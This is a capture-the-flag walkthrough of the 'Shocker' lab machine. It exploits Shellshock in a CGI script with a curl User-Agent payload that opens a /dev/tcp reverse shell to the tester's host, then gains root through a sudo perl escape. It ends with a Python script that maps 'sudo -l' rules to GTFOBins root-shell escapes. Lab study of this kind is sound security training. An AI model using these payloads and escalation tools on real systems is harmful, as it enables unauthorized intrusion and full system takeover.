Shocker Writeup

Without Metasploit


Last updated 3 years ago


Reconnaissance

Initial Nmap scan to find open ports, treating all hosts as online (-Pn) so the scan proceeds even if ICMP ping is blocked:

nmap -Pn 10.10.10.56

Detailed Nmap scan of the two ports found open:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Default Nmap scripts

  • (-p): Scan only ports 80 and 2222

  • (-oN nmap): Save the output in normal format to a file called nmap

nmap -sC -sV -p 80,2222 -oN nmap 10.10.10.56

Enumeration

Let's visit the website.

It is just a few words and an image, and there is nothing of interest in the source code, so let's use Gobuster to find hidden directories on the web server.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56

We only got one directory, and we were not allowed to access it. After thinking for a while about why the machine is named "Shocker", and since port 80 (a web server) was the only service that gave us anything to enumerate, I searched for something along the lines of "Shocker website vulnerabilities" and found the "Shellshock" vulnerability (CVE-2014-6271). Further reading showed that it affects web servers that run CGI (Common Gateway Interface) scripts, a mechanism for generating dynamic web content: the server hands request headers to the script as environment variables, and a vulnerable Bash executes code hidden in a crafted variable value while importing them. When thinking of CGI, we usually see directories like /cgi-bin and /cgi-sys, so I tried those names.

Requesting /cgi-bin gave a Not Found error. Then, looking at the next tab, I thought: why not add a forward slash at the end of the URL and see what happens? To my surprise it returned 403 Forbidden, which means the directory exists but we are not allowed to access it. Now I was curious whether adding "/" to every directory Gobuster tried would give different results, as it did in this experiment. (-f) appends "/" to every directory request.

We were not allowed to access "icons" either, so let's search for directories or files in /cgi-bin/ with some common extensions. (-x) specifies the extensions to append to each wordlist entry.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -f -x php,html,txt,sh

Looks like we found a file, user.sh; let's go and check what it contains.

When visiting the page, we are offered the file as a download rather than seeing its output.

Exploitation

Now we have nothing but this Bash script, and it is served with "Content-Type: text/plain", which is interesting. The number one tool for web exploitation is Burp Suite, so I captured the request to the script and sent it to Repeater to look at the headers we control.

We know from our enumeration that this CGI script is the likely Shellshock target, so I searched for the vulnerability and found an article showing how it can be used to send a reverse shell from the web server back to our machine, and tried that.

We use "curl", a tool that sends web requests to a web server from the terminal. The User-Agent header reaches the script as the HTTP_USER_AGENT environment variable; the value starts with "() { :; };", an empty function definition, and a vulnerable Bash executes whatever follows the closing brace when it imports that variable.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.19/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh

Before running it, start a Netcat listener on the port named in the payload:

nc -lvnp 1234

When you hit enter on the curl command, the reverse shell arrives in the listener, but as a low-privilege user. The curl command itself typically appears to hang, because the injected shell is executed before the script can produce a response.

Privilege Escalation

Let's run "sudo -l" to see what we can run as root.

Looks like we can run /usr/bin/perl as root without a password, so let's go to GTFOBins and find the command that lets us escalate to root. The command is:

sudo perl -e 'exec "/bin/sh";'

And we are root!
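Reading "sudo -l" output by eye works on a single rule like this one, but on busier hosts it helps to parse it and match each binary against the GTFOBins sudo entries automatically. The script below is an added example written for this writeup, not code from the original page or from GTFOBins itself. The sample output is constructed to match the situation described here (perl runnable as root without a password); the username "lowpriv" is a placeholder, and the escape table goes beyond the page's perl case with a few other well-known GTFOBins sudo entries.

```python
#!/usr/bin/env python3
"""Scan `sudo -l` output for rules with a known GTFOBins shell escape.

Added example for this writeup, not code from the original page.
"""
import os
import re
from dataclasses import dataclass

# Shell escapes from the GTFOBins "sudo" entries, keyed by binary name.
# Each is run as `sudo <escape>` and drops into a root shell.
GTFOBINS_SUDO = {
    "perl": "perl -e 'exec \"/bin/sh\";'",
    "python": "python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "python3 -c 'import os; os.system(\"/bin/sh\")'",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
    "find": "find . -exec /bin/sh \\; -quit",
    "vim": "vim -c ':!/bin/sh'",
    "env": "env /bin/sh",
}

# One sudoers rule as printed by `sudo -l`, e.g. "(root) NOPASSWD: /usr/bin/perl"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(.+?)\s*$")


@dataclass
class SudoRule:
    runas: str      # user part of the "(runas_user : runas_group)" field
    command: str
    nopasswd: bool

    @property
    def escape(self):
        """Command that abuses this rule for a shell, or None if unknown."""
        if self.command == "ALL":
            return "sudo /bin/sh"
        binary = os.path.basename(self.command.split()[0])
        esc = GTFOBINS_SUDO.get(binary)
        return f"sudo {esc}" if esc else None


def parse_sudo_l(output: str):
    """Return the rules listed after the 'User X may run ...' line."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue            # skip the "Matching Defaults entries" block
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        nopasswd = "NOPASSWD:" in tags
        for cmd in commands.split(","):  # one rule may list several commands
            rules.append(SudoRule(runas.split(":")[0].strip(), cmd.strip(), nopasswd))
    return rules


def find_privesc(output: str, need_nopasswd: bool = True):
    """Rules that run as root (or ALL) and have a known escape.

    need_nopasswd=True mirrors a shell obtained through Shellshock: we do not
    know the current user's password, so only NOPASSWD rules are usable.
    """
    return [r for r in parse_sudo_l(output)
            if r.runas in ("root", "ALL")
            and (r.nopasswd or not need_nopasswd)
            and r.escape]


# Constructed sample in the usual `sudo -l` layout; "lowpriv" is a placeholder.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lowpriv on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lowpriv may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

if __name__ == "__main__":
    import sys
    # Pipe real output in (`sudo -l | python3 sudo_escapes.py`) or use the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SUDO_L
    for rule in find_privesc(text):
        print(f"{rule.command} as {rule.runas}: {rule.escape}")
```

On the sample this prints the perl escape used above. Rules that run as a non-root user, or that require a password, are left out by default; pass need_nopasswd=False once you have the user's password and want every candidate.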